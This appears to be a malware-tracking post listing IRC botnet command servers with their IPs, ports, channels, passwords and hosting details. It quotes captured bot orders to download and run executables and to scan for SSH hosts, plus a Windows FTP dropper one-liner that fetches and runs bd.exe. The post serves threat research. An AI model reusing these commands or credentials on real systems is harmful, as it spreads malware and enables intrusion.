Thanks to this guy for the sample
Resolved : [t7v4d.com] To [108.170.24.42]
Server: t7v4d.com:4040
Now talking in ##tnt
Topic is ‘!np hxxp://3rbcool.net/g1.exe DF37A37D9E33FB9904235855863AA5D5 -r’
Hosting infos: http://whois.domaintools.com/108.170.24.42

95.86.207.142 (irc botnet hosted in Russian Federation Yaroslavl’ Ojsc Rostelecom Yaroslavl Branch)
Server: 95.86.207.142 1866
Channel: #!x!
Hosting infos: http://whois.domaintools.com/95.86.207.142

122.195.244.35 (irc botnet hosted in China Nanjing Huaianwangtongdizhichi Huaian Jiangsu Province)
Server: 122.195.244.35:8888
Now talking in #!x!
Topic:
Topic: Set by [Yuri (unknown address)] at (Thu May 16 09:59:25 2013)
Other channels:
Now talking in #1
Topic On: [#1 ] [ !NAZEL hxxp://146.185.246.190/7384IEP.da !NAZEL hxxps://hotfile.com/dl/223005198/7893880/g.exe ]
Topic By: [ p81 ]
Now talking in #2
Topic On: [ #2 ] [!NAZELturbo hxxp://146.185.246.190/7384IEP.da udos.exe | !NAZEL hxxps://hotfile.com/dl/223005198/7893880/g.exe yufck.exe ]
Topic By: [ p81 ]

teamirc.sytes.net (irc botnet hosted in Russian Federation Moscow Broadband Internet Access For Customers Rostelecom)
Resolved : [teamirc.sytes.net] To [188.254.47.158]
Server: 188.254.47.158:6667
Nick: [A|W_XP|1]pfmxd
Username: 20173
Joined Channel: #Mirc#
Channel Topic for Channel #MirC#: “!dlexec hxxp://46.254.16.170/7.exe”
Hosting infos: http://whois.domaintools.com/188.254.47.158

irc.e-qacs.com (irc botnet hosted in Denmark Glostrup Nianet A/s)
Resolved : [irc.e-qacs.com] To [130.185.133.134]
Server: irc.e-qacs.com:8782
Now talking in #sshscan2
Topic On: [ #sshscan2 ] [ .scan sshgodscan 100 0 0 x.x.x.x -r -n ]
Topic By: [ {00-RUS-VISTA-WIN ]
Found by x00
Hosting infos: http://whois.domaintools.com/130.185.133.134

vhost.bounceme.net (irc botnet hosted in France Paris Nerim Sas)
Resolved : [vhost.bounceme.net] To [194.242.114.177]
Server: 194.242.114.177:6667
Server Password:
Username: Pmx
Nickname: aKH-4mins
Channel: #sys# (Password: )
Channeltopic:
Same guy, different domain: scan.no-ip.org 194.242.114.177
Server: 194.242.114.177:6667
Server Password:
Username: skjcxmot
Nickname: [nLh-VNC]otkfck
Channel: sex (Password: )
Channel: #bot
Channeltopic:
Credits to x00 for samples :-)
Hosting infos: http://whois.domaintools.com/194.242.114.177

were.hacked.jp (irc botnet hosted in France Roubaix Ovh Systems)
Thanks to anonymous guy in this post for the sample
Resolved : [were.hacked.jp] To [176.31.123.56]
Server: 176.31.123.56:8782
Server Password:
Username: __x00
Nickname: {x00-00-DEU-XP-DELL-9640}
Channel: ###x00### (Password: )
Channeltopic: :.ban |.scan sshspreadscan 120 7 0 41.x.x.x
sample here
Hosting infos: http://whois.domaintools.com/176.31.123.56

h.opennews.su (irc botnet hosted by qhoster.com)
Resolved h.opennews.su to 5.45.181.254
Server: h.opennews.su
Port: 9000
Channel: #sp
Channel password: yop
Topic for #sp is: !wB/smZJsKbDADvo5ab8sIF/r5RP7kkXfEsreBMH+9hiVs3ilngzFHh0Ph9sbgtC/EeqYw5x0Vj2IqRyb/knFS+LUzo6bf3cW/A1SyUXkVxz8ERDPS2K/qHObIS3TFyR2JAiWdnWc82S3KnAwUHQFMEb6h/kQqB9TcZElsKS4BnyDiGp1B19crjVgBes7+ilkHVmFLRRgoSPyUBx71ioiUporVdeOIEUhA547CIbp0odHxRQ41LK9wPz13N8KYZx6/QE//rZhBqCorPJqg3w=
Topic for #sp set by SNK at Thu Apr 04 06:16:09 2013
Example bot nick: n{USA-XPx86u}gjekbowg
Alternate domains: f.eastmoon.pl gigasbh.org gigasphere.su o.dailyradio.su photobeat.su s.richlab.pl uranus.kei.su xixbh.com xixbh.net
You may recognize some of the domains from previous posts.

priv8.blackunix.com (irc botnet hosted in United States Seattle The Endurance International Group Inc.)
Resolved : [priv8.blackunix.com] To [209.59.209.111]
Server: 209.59.209.111:5545
Server Password: ownz
Username: xcembmbr
Nickname: priv88qPCdHIIQo
The botnet spreads via FTP:
cmd /c echo open pasalles.no-ip.org 21 >> ik &echo user kurt kurt >> ik &echo binary >> ik &echo get bd.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &bd.exe &exit

199.229.249.189 (irc botnet hosted in United States Atlanta Colo At 55 Llc)
Remote Host        Port Number
199.229.249.189    443
Local users: 131 4000 Current local users 131, max 4000
Global users: 140 4010 Current global users 140, max 4010
USER zwin- 127.0.0.1 localhost :Operation Dildos
NICK zwin-WHDKCF|1837|
JOIN #test :
JOIN #test3 :god
NICK zwin-TIGYPT|1952|
Hosting infos: http://whois.domaintools.com/199.229.249.189